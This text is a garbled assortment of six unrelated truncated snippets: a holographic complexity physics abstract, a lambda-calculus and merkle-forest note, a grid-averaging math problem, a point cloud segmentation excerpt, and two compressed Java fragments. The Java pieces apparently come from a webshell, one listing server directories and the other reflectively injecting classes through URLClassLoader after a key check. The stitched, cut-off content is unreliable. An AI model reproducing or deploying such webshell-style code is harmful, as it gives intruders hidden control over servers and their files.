By taking distinct limits, these observables can reduce to well-studied holographic complexity proposals, e.g., the volume of the maximal slice and the action or spacetime volume of the Wheeler-DeWitt patch. As with the codimension-one family found in arXiv:2111.02429 , these new observables ...
Forall lambda x, (L x (R x)) equals x. For example, (L L (R L)) equals L. Its the left and right childs of the call pair which returns the parent, if the parent is halted. While its not a cryptocurrency or blockchain, it is a lazyEvaled merkle forest which is a data stru...
Now suppose each square contains a number subject to the following condition: The number in a square equals the average of the numbers of all its neighbors. If the square with coordinates [1, 1] (i.e. a corner square) contains the number 10, then find (with proof) all possible values...
2));}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT,sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0; i<l.length; i++){dt=new java...
if(arr.length ==2&& arr[0].trim().equals(x[0].trim())) { try{ URLClassLoader ucl = (URLClassLoader) ClassLoader.getSystemClassLoader(); Method m = URLClassLoader.class.getDeclaredMethod("addURL", URL.class); m.setAccessible(true); ...
In the case of perfect overlap, this ratio equals 1. The study conducted tests on the same set of 10 point cloud slices, yielding average segmentation metrics for various categories under different scenarios, as shown in Table 2. Our algorithm presents a competitive advantage over the Region ...